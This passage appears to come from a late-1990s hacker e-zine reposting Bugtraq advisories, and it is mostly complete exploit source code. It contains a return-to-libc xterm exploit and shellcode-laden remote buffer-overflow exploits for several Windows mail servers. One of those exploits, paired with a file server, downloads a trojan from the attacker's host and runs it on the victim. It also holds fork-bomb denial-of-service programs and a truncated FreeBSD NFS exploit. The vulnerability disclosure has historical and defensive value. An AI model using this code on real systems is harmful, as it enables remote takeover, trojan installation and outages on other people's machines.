sploit by typo@scene.at (libc jumpback) // only made this to bypass nonexecutable stack patches - http://teso.scene.at/ // Redhat 6 offsets (i only needed these) int sys = 0x401bca40; // system int sh = 0x4025ab12; // /bin/sh int exi = 0x4020b910; // _exit int ran = 0x401b9928; // random offset in libc int eip = 2136; #define fil "/tmp/teso_termcap" #define xte "/usr/X11R6/bin/xterm" #define entry "xterm|" int main(int argc, char **argv) { char *buf; int fd, buflen; argv++; if (argc>1) // dec,!hex args sys = atoi(*(argv++)); if (argc>2) sh = atoi(*(argv++)); if (argc>3) exi = atoi(*(argv++)); if (argc>4) eip = atoi(*(argv++)); buflen = eip + 20; buf = (char *) malloc(buflen); memset(buf, 'x', buflen); buf[buflen] = 0; memcpy(buf, entry, strlen(entry)); memcpy (buf+buflen-4,":\\y",3); memcpy(buf+eip,&sys,4); memcpy(buf+eip+4,&exi,4); memcpy(buf+eip+8,&sh,4); memcpy(buf+eip+12,&ran,4); if ( (fd = open(fil, O_WRONLY|O_CREAT|O_TRUNC, "644"))<0) { perror("cannot create file"); exit(EXIT_FAILURE); } write(fd,buf,buflen); close(fd); free(buf); setenv("TERMCAP", fil, 1); execl(xte, "xterm", NULL); exit(EXIT_SUCCESS); } @HWA 57.0 Various buffer overflows in Windows POP3/SMTP servers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: Many kind of POP3/SMTP server softwares for Windows have buffer overflow bug To: BUGTRAQ@SECURITYFOCUS.COM Many kind of POP3/SMTP server softwares for Windows have buffer overflow bug (by The Shadow Penguin Securuty http://shadowpenguin.backsection.net) 1. Introduction I confirmed many kind of POP3/SMTP servers for Windows which are published on "SOFT-SEEK.com" contain the buffer overflow bugs. I list the softwares which have buffer overflow bug, I also publish the exploit programs for some software. 2. POP3/SMTP server softwares which have buffer overflow bugs Software Version Service Overflow Point ------------------------------------------------------- @Work SmartServer3 3.51 SMTP long MAIL FROM: CMail Server 2.3 SP2 SMTP long MAIL FROM: Personal Mail Server 3.09 SMTP long MAIL FROM: (I've notified to developer) Tiny FTP daemon 0.51 POP3 long USER (I've notified, Now fixed) Internet Anywhere 2.2.2 POP3 long USER FuseMail 2.7 POP3 long USER,PASS aVirt Mail Server 3.3 POP/SMTP long MAIL FROM:,long USER If the host recives the packet which contains the exploit code, the host has been cracked by any instructions which are coded in the exploit code. We show the demonstration programs which execute any command on the victim host. For the proof of the risk of intrusion, I also publish the exploit program for "Personal Mail Server" that can send a prepared program to victim host and execute it. If the trojan program is sent, the victim machine will be controlled remotely. If the host receives the packet which contains the exploit code, the host will execute any instructions that is written in the exploit code. We show the demonstration programs which execute any command on the victim host. For the proof of the risk of intrusion, I publish the exploit program for "Personal Mail Server" that can send a trojan program which is prepared in the attacker host. Of course, it can be executed remotely. If the trojan program is sent, the victim machine will be controlled remotely. 3. Exploit I coded the exploits for the following softwares: (1) @Work SmartServer3 (2) CMail Server (3) FuseMail 2.7 (4) Personal Mail Server (5) Tiny FTP daemon (5) is now fixed, I publish the exploit program for (1)-(4) ------------------- (1) @Work SmartServer3 /*============================================================================= NetcPlus SmartServer3 Exploit for Windows98 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include <stdio.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/time.h> #include <unistd.h> #define BUFSIZE 2000 #define SMTP_PORT 25 #define RETADR 1167 #define JMPADR 1163 #define JMPOFS 6 #define EIP 0xbff7a06b #define NOP 0x90 #define JMPS 0xeb unsigned char exploit_code[200]={ 0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B, 0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF, 0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4, 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7, 0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52, 0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28, 0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53, 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6, 0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF, 0xFF,0x00}; unsigned char cmdbuf[200]="msvcrt.dll.system.exit.welcome.exe"; int main(int argc,char *argv[]) { struct hostent *hs; struct sockaddr_in cli; char packetbuf[BUFSIZE+3000],buf[BUFSIZE]; int sockfd,i,ip; if (argc<2){ printf("usage\n %s HostName\n",argv[0]); exit(1); } bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_port = htons(SMTP_PORT); if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); exit(1); } cli.sin_family = hs->h_addrtype; memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length); } if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(0); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ perror("connect"); exit(0); } while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } strcat(exploit_code,cmdbuf); exploit_code[65]=strlen(cmdbuf+23); memset(buf,0x90,BUFSIZE); ip=EIP; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[JMPADR] =JMPS; buf[JMPADR+1]=JMPOFS; memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code)); buf[2000]=0; sprintf(packetbuf,"helo penguin\r\n"); write(sockfd,packetbuf,strlen(packetbuf)); while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } printf("%s\n",packetbuf); sprintf(packetbuf,"MAIL FROM: %s\r\n",buf); write(sockfd,packetbuf,strlen(packetbuf)); sleep(100); close(sockfd); } ------------------- (2) CMail Server /*============================================================================= CMAIL Server 2.3 SP2 Exploit for Windows98 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include <stdio.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/time.h> #include <unistd.h> #define BUFSIZE 2000 #define SMTP_PORT 25 #define RETADR 626 #define JMPADR 622 #define JMPOFS 6 #define EIP 0xbff7a06b #define NOP 0x90 #define JMPS 0xeb unsigned char exploit_code[200]={ 0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B, 0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF, 0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4, 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7, 0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52, 0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28, 0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53, 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6, 0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF, 0xFF, 0x00}; unsigned char cmdbuf[200]="msvcrt.dll.system.exit.welcome.exe"; int main(int argc,char *argv[]) { struct hostent *hs; struct sockaddr_in cli; char packetbuf[BUFSIZE+3000],buf[BUFSIZE]; int sockfd,i,ip; if (argc<2){ printf("usage\n %s HostName\n",argv[0]); exit(1); } bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_port = htons(SMTP_PORT); if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); exit(1); } cli.sin_family = hs->h_addrtype; memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length); } if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(0); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ perror("connect"); exit(0); } while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } strcat(exploit_code,cmdbuf); exploit_code[65]=strlen(cmdbuf+23); memset(buf,0x90,BUFSIZE); ip=EIP; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[JMPADR] =JMPS; buf[JMPADR+1]=JMPOFS; memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code)); buf[BUFSIZE]=0; sprintf(packetbuf,"helo penguin\r\n"); write(sockfd,packetbuf,strlen(packetbuf)); while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } printf("%s\n",packetbuf); sprintf(packetbuf,"MAIL FROM: aa <%s@aa.com>\r\n",buf); write(sockfd,packetbuf,strlen(packetbuf)); sleep(100); close(sockfd); } ------------------- (4) FuseMail 2.7 /*============================================================================= FuseMail Version 2.7 Exploit for Windows98 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include <stdio.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/time.h> #include <unistd.h> #define BUFSIZE 1159 #define RETADR 1074 #define FTP_PORT 110 #define JMP_ESP 0xbff7a027 unsigned char exploit_code[200]={ 0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3, 0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7, 0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4, 0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E, 0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53, 0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF, 0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF, 0xFF,0x00 }; unsigned char cmdbuf[200]="msvcrt.dll.system.notepad.exe"; int main(int argc,char *argv[]) { struct hostent *hs; struct sockaddr_in cli; char packetbuf[3000],buf[1500]; int sockfd,i,ip; if (argc<2){ printf("usage\n %s HostName\n",argv[0]); exit(1); } bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_port = htons(FTP_PORT); if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified host.\n"); exit(1); } cli.sin_family = hs->h_addrtype; memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length); } if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(0); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ perror("connect"); exit(0); } while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } strcat(exploit_code,cmdbuf); memset(buf,'a',BUFSIZE); buf[BUFSIZE]=0; ip=JMP_ESP; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; strncpy(buf+RETADR+4,exploit_code,strlen(exploit_code)); sprintf(packetbuf,"USER %s\r\n",buf); write(sockfd,packetbuf,strlen(packetbuf)); while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } memset(packetbuf,0,1024); sprintf(packetbuf,"PASS sample\r\n"); write(sockfd,packetbuf,strlen(packetbuf)); close(sockfd); } ------------------- (4) Personal Mail Server Prog.1 : This program sends the very small client program which can execute the trojan after the translation from other host. Prog.2 : Program Translation Server. The Program Translation Server which is used by Prog.1 Prog.1 /*============================================================================= Personal Mail Server Version 3.072-3.09 Exploit for Windows98 The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ============================================================================= */ #include <stdio.h> #include <string.h> #include <netdb.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/types.h> #include <sys/time.h> #include <unistd.h> #define BUFSIZE 4000 #define SMTP_PORT 25 #define RETADR 267 #define JMPADR 263 #define JMPOFS 6 #define EIP 0xbff7a06b #define NOP 0x90 #define JMPS 0xeb unsigned char exploit_code[700]={ 0xEB,0x58,0x5F,0x32,0xC0,0x8B,0xDF,0x33,0xC9,0xB1,0x09,0xFE,0xC1,0x03,0xD9,0x88, 0x03,0x88,0x47,0x16,0x88,0x47,0x21,0x88,0x47,0x28,0x88,0x47,0x30,0x88,0x47,0x35, 0x88,0x47,0x41,0x88,0x47,0x47,0x88,0x47,0x4E,0x88,0x47,0x55,0x88,0x47,0x58,0x88, 0x47,0x5E,0x88,0x47,0x65,0x88,0x47,0x6A,0x8B,0xC7,0x50,0xB8,0x50,0x77,0xF7,0xBF, 0xFF,0xD0,0x89,0x47,0x6E,0x8B,0xC7,0x33,0xC9,0xB1,0x0B,0x03,0xC1,0x50,0xB8,0x50, 0x77,0xF7,0xBF,0xFF,0xD0,0x89,0x47,0x72,0xEB,0x02,0xEB,0x72,0x8B,0xC7,0x33,0xC9, 0xB1,0x17,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B, 0xF0,0x8B,0xC7,0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0x33,0xC0,0xB0,0x02,0x50,0xFF, 0xD6,0x57,0x33,0xC9,0xB1,0x82,0x03,0xF9,0x33,0xC9,0x66,0xB9,0x90,0x01,0x33,0xC0, 0xF3,0xAA,0x5F,0x8B,0xC7,0x33,0xC9,0xB1,0x22,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8, 0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0x50,0x40,0x50,0x40,0x50,0xFF, 0xD6,0x89,0x47,0x76,0x8B,0xDF,0x33,0xC9,0xB1,0x82,0x03,0xD9,0xC6,0x03,0x02,0x66, 0xC7,0x43,0x02,0x1B,0x58,0xC7,0x43,0x04,0xEE,0xEE,0xEE,0xEE,0xEB,0x02,0xEB,0x56, 0x8B,0xC7,0x33,0xC9,0xB1,0x29,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7, 0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0xB0,0x10,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x82, 0x03,0xC1,0x50,0xFF,0x77,0x76,0xFF,0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x42,0x03,0xC1, 0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x8B,0xC7,0x33, 0xC9,0xB1,0x56,0x03,0xC1,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x59,0x03,0xC1,0x50,0xFF, 0xD6,0x89,0x47,0x7A,0xEB,0x02,0xEB,0x63,0x8B,0xC7,0x33,0xC9,0xB1,0x31,0x03,0xC1, 0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0x50, 0x66,0xB8,0xE8,0x03,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0xFF,0x77, 0x76,0xFF,0xD6,0x89,0x47,0x7E,0x33,0xDB,0x3B,0xC3,0x74,0x31,0x72,0x2F,0x8B,0xC7, 0x33,0xC9,0xB1,0x48,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF, 0xD0,0x8B,0xF0,0xFF,0x77,0x7A,0xFF,0x77,0x7E,0x33,0xC0,0xB0,0x01,0x50,0x8B,0xC7, 0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0xFF,0xD6,0xEB,0x9D,0xEB,0x6C,0x8B,0xC7,0x33, 0xC9,0xB1,0x36,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0, 0x8B,0xF0,0xFF,0x77,0x76,0xFF,0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x4F,0x03,0xC1,0x50, 0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0xFF,0x77,0x7A,0xFF, 0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x5F,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E, 0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x8B,0xC7,0x33,0xC9,0xB1,0x59,0x03,0xC1,0x50,0xFF, 0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x66,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E, 0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0x53,0xFF,0xD0,0x90,0xE8,0x03,0xFE,0xFF,0xFF,0x6D, 0x73,0x76,0x63,0x72,0x74,0x2E,0x64,0x6C,0x6C,0x2C,0x77,0x73,0x6F,0x63,0x6B,0x33, 0x32,0x2E,0x64,0x6C,0x6C,0x2C,0x57,0x53,0x41,0x53,0x74,0x61,0x72,0x74,0x75,0x70, 0x2C,0x73,0x6F,0x63,0x6B,0x65,0x74,0x2C,0x63,0x6F,0x6E,0x6E,0x65,0x63,0x74,0x2C, 0x72,0x65,0x63,0x76,0x2C,0x63,0x6C,0x6F,0x73,0x65,0x73,0x6F,0x63,0x6B,0x65,0x74, 0x2C,0x66,0x6F,0x70,0x65,0x6E,0x2C,0x66,0x77,0x72,0x69,0x74,0x65,0x2C,0x66,0x63, 0x6C,0x6F,0x73,0x65,0x2C,0x77,0x62,0x2C,0x78,0x2E,0x65,0x78,0x65,0x2C,0x73,0x79, 0x73,0x74,0x65,0x6D,0x2C,0x65,0x78,0x69,0x74,0x2C,0x2C,0x2C,0x2C,0x00 }; int main(int argc,char *argv[]) { struct hostent *hs; struct sockaddr_in cli; char packetbuf[BUFSIZE+3000],buf[BUFSIZE]; int sockfd,i; unsigned int ip,port,yourip; if (argc<3){ printf("usage\n %s VictimHostName YourHostName\n",argv[0]); exit(1); } if ((yourip=inet_addr(argv[2]))==-1){ if ((hs=gethostbyname(argv[2]))==NULL){ printf("Can not resolve specified YourHost.\n"); exit(1); } memcpy((caddr_t)&yourip,hs->h_addr,hs->h_length); } bzero(&cli, sizeof(cli)); cli.sin_family = AF_INET; cli.sin_port = htons(SMTP_PORT); if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){ if ((hs=gethostbyname(argv[1]))==NULL){ printf("Can not resolve specified VictimHost.\n"); exit(1); } cli.sin_family = hs->h_addrtype; memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length); } if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){ perror("socket"); exit(0); } if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){ perror("connect"); exit(0); } while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } printf("1:%s\n",packetbuf); memset(buf,0x90,BUFSIZE); for (i=267;i<271;i++) buf[i]=0x30; ip=EIP; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=(ip>>24)&0xff; buf[JMPADR] =JMPS; buf[JMPADR+1]=JMPOFS; port=7000; exploit_code[0xc3]=(port>>8) & 0xff; exploit_code[0xc4]=port & 0xff; ip=htonl(yourip); exploit_code[0xc8]=(ip>>24) & 0xff; exploit_code[0xc9]=(ip>>16) & 0xff; exploit_code[0xca]=(ip>>8) & 0xff; exploit_code[0xcb]=ip & 0xff; memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code)); buf[BUFSIZE]=0; sprintf(packetbuf,"helo penguin\r\n"); write(sockfd,packetbuf,strlen(packetbuf)); while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){ packetbuf[i]=0; if(strchr(packetbuf,'\n')!=NULL) break; } printf("%s\n",packetbuf); sprintf(packetbuf,"MAIL FROM: %s\r\n",buf); write(sockfd,packetbuf,strlen(packetbuf)); close(sockfd); } Prog.2 #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <sys/stat.h> #include <fcntl.h> #include <errno.h> #include <netinet/in.h> #include <arpa/inet.h> #define PORT_NUM 7000 #define BUFSIZE 1000 #define SENDFILE "test.exe" int get_connection(port, listener) int port; int *listener; { struct sockaddr_in address,acc; int listening_socket,connected_socket; int reuse_addr=1,acclen=sizeof(acc); memset((char *) &address, 0, sizeof(address)); address.sin_family = AF_INET; address.sin_port = htons(port); address.sin_addr.s_addr = htonl(INADDR_ANY); listening_socket = socket(AF_INET, SOCK_STREAM, 0); if (listening_socket < 0) { perror("socket"); exit(1); } if (listener != NULL) *listener = listening_socket; setsockopt(listening_socket,SOL_SOCKET,SO_REUSEADDR, (void *)&reuse_addr,sizeof(reuse_addr)); if (bind(listening_socket,(struct sockaddr *)&address, sizeof(address))<0){ perror("bind"); exit(1); } listen(listening_socket, 5); connected_socket=accept(listening_socket, (struct sockaddr *)&acc,&acclen); return connected_socket; } int main(argc, argv) int argc; char *argv[]; { int sock,listensock,i,r,l; char buf[BUFSIZE]; struct stat st; FILE *fp; if ((fp=fopen(SENDFILE,"rb"))==NULL){ printf("File not found \"%s\"\n",SENDFILE); exit(1); } stat(SENDFILE,&st); r=st.st_size/BUFSIZE+1; sock = get_connection(PORT_NUM, &listensock); for (i=0;;i++){ l=fread(buf,1,BUFSIZE,fp); if (l<=0) break; write(sock,buf,l); } fclose(fp); close(sock); } << Demonstration >> Victim host : 192.168.200.200 Your host : 192.168.100.100 (1) copy your testprogram "test.exe" to UNIX machine. (2) gcc ex_pms1.c -o pms1 (3) gcc sendexp.c -o sendexp (4) ./sendexp & (5) ./pms1 192.168.200.200 192.168.100.100 You can send "test.exe" to victim host, and can execute it remotely. The size of "test.exe" is not limited. ----- The Shadow Penguin Security (http://shadowpenguin.backsection.net) Webmaster / UNYUN (shadowpenguin@backsection.net) @HWA 58.0 NetBSD 1.4.1 local DoS ~~~~~~~~~~~~~~~~~~~~~~ Subject: Re: NetBSD 1.4.1 local DoS To: BUGTRAQ@SECURITYFOCUS.COM This does not `freeze' the system per se. What it does is tie up all the network resources, and make it impossible to any network I/O (even through Un*x-domain sockets). Linux is not generally vulnerable to the exploit as posted, because it seems to only accept 64512 bytes from the write(2)s, and limit the file descriptor table to 256 entries (at least by default), thus making the program chew up less memory. However, a trivial variant (attached below) causes memory exhaustion on the Linux system I tested. Interestingly, this did not cause the Linux system to crash, but it does cause a bunch of processes to be killed -- gpm, klogd, update, crond, and finally the test program itself. So there is still a denial of service, especially if the program is modified to continually fork as well (also attached below, although it could be done a bit better). -----8<-----snip-----8<-----snip-----8<-----snip-----8<-----snip-----8<----- #include <unistd.h> #include <sys/socket.h> #include <fcntl.h> #define NPROCS 20 #define BUFFERSIZE 204800 extern int main(void) { int p[2], i; char crap[BUFFERSIZE]; for (i = 0; i < NPROCS - 1; i++) { if (fork()) break; } sleep(5); while (1) { if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) break; i = BUFFERSIZE; setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); fcntl(p[0], F_SETFL, O_NONBLOCK); fcntl(p[1], F_SETFL, O_NONBLOCK); write(p[0], crap, BUFFERSIZE); write(p[1], crap, BUFFERSIZE); } pause(); return (0); } -----8<-----snip-----8<-----snip-----8<-----snip-----8<-----snip-----8<----- #include <unistd.h> #include <sys/socket.h> #include <fcntl.h> #define BUFFERSIZE 204800 extern int main(void) { int p[2], i; char crap[BUFFERSIZE]; while (1) { fork(); if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1) break; i = BUFFERSIZE; setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int)); setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int)); fcntl(p[0], F_SETFL, O_NONBLOCK); fcntl(p[1], F_SETFL, O_NONBLOCK); write(p[0], crap, BUFFERSIZE); write(p[1], crap, BUFFERSIZE); } pause(); return (0); } -----8<-----snip-----8<-----snip-----8<-----snip-----8<-----snip-----8<----- @HWA 59.0 Netscape communicator 4.06J, 4.5J-4.6J, 4.61e Buffer Overflow ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Subject: Re: Netscape communicator 4.06J, 4.5J-4.6J, 4.61e Buffer Overflow To: BUGTRAQ@SECURITYFOCUS.COM Hello David Parker$B!!(Bwrites: > I tried the 4 exploit test links, and they all crashed Netscape but > didn't cause any bluescreens or run any programs. I have win98, > Netscape 4.5 128-bit, and the same msvcrt.dll (6.00.8397). I'm not > sure how to debug the crashes, so I'm including the illegal operation > errors, hopefully they will be of some help: We could confirm that the exploit codes which were published at the demo site were executed. We think that the reason you can not confirm the executed the exploit codes is based on the difference of the Windows kernel code. The exploit code which is posted by R00tZer0 is for Japanese Windows98, this exploit uses the codes which is written in 0xbff7a06b. In case Japanese Windows98, JMP EBX(FFH,E3H) code is written in such address. If you remake the exploit code that can exploit the specified netscape communicators, you have to change the address which is specified in the exploit code. We don't have the environment of the English Windows, we could not code for English Windows. Maybe, you will be able to get the address of JMP EBX code by the following program. So, if someone succeeded or could get the address which is written the JMP EBX code, please tell us the address of JMP EBX code. #include <windows.h> #include <stdio.h> unsigned int mems[]={ 0xbfb70000,0xbfbfc000, 0xbfde0000,0xbfde6000, 0xbfdf0000,0xbfdf5000, 0xbfe00000,0xbfe10000, 0xbfe30000,0xbfe43000, 0xbfe80000,0xbfe86000, 0xbfe90000,0xbfe96000, 0xbfea0000,0xbfeb0000, 0xbfee0000,0xbfee5000, 0xbff20000,0xbff47000, 0xbff50000,0xbff61000, 0xbff70000,0xbffc6000, 0xbffc9000,0xbffe3000, 0,0}; void search_mem(FILE *fp,unsigned char *st,unsigned char *ed, unsigned char c1,unsigned char c2) { unsigned char *p; fprintf(fp,"Result : %x - %x\n",(unsigned int)st,(unsigned int)ed); for (p=st;p<ed;p++) if (*p==c1 && *(p+1)==c2) fprintf(fp,"%x : %x %x %x %x\n",p,*p&255,*(p+1)&255,*(p+2)&255,*(p+3)&255); } int APIENTRY WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow) { FILE *fp; int i; if ((fp=fopen("adr.txt","w"))!=NULL){ for (i=0;;i+=2){ if (mems[i]==0) break; search_mem(fp,(unsigned char *)mems[i],(unsigned char *)mems[i+1],0xff,0xe3); } fclose(fp); } return 0; } Kerb$B!!(Bwrites: > When I went there with NC 4.05, it gave me a blue screen of death that was > completely unrecoverable. I had to reboot the system. > So, basically, it is a DoS for Netscape users, could possibly be coded > into a CGI or Javascript that checks browser > version and writes the corresponding exploit code. Just a thought. The CGIs which are published at the demo site are not for DoS attack. Of course, we could develop the codes for the DoS attack. We also could develop the HDD format code, virus code, trojan code, and so on. If the trojan code is written in the exploit code, the all visitors' PC will be cracked, and if the hdd format code is written, the visitors' HDD will be cleaned completely. It's very serious problem. In this case, the stack area that can be used for exploit code is wide enough. I will post the demo programs which can send the trojan by using the security hole on other applications. ----- The Shadow Penguin Security (http://shadowpenguin.backsection.net) Webmaster / UNYUN (shadowpenguin@backsection.net) @HWA 60.0 FreeBSD NFS Exploit ~~~~~~~~~~~~~~~~~~~ #include <sys/types.h> #include <sys/stat.h> #include <sys/wait.h> #include <fcntl.h> #include <unistd.h> #include <stdlib.h> #include <signal.h> #include <stdio.h> #include <sys/time.h> #include <time.h> void usr1() { } int main(int argc, char ** argv) { int nbfils; int nbopen; int tbloc; int tfichier; char filename[512]; int i, j, k, f; int pid; struct timeval start; struct timeval end; float delay; void * bloc; if (argc<6) { fprintf(stderr, "Syntax: %s rep_nfs/ nb_child nb_open sizefile(Kb) blocksize(kb).\n", argv[0]); fprintf(stderr, "ie: %s /TEST/ 120 200 20000 100\n"); exit(EXIT_FAILURE); } nbfils = atoi(argv[2]); nbopen = atoi(argv[3]); tfichier = atoi(argv[4]); tbloc = atoi(argv[5]); bloc = malloc(tbloc * 1024); memset(bloc, 0, tbloc * 1024); if (!bloc) { fprintf(stderr, "%s: ", argv[0]); perror("malloc"); exit(-1); } fprintf(stderr, "forking %d times...\n", nbfils); signal(SIGUSR1, &usr1); j = 0; for(i=0;i<nbfils;i++) { pid 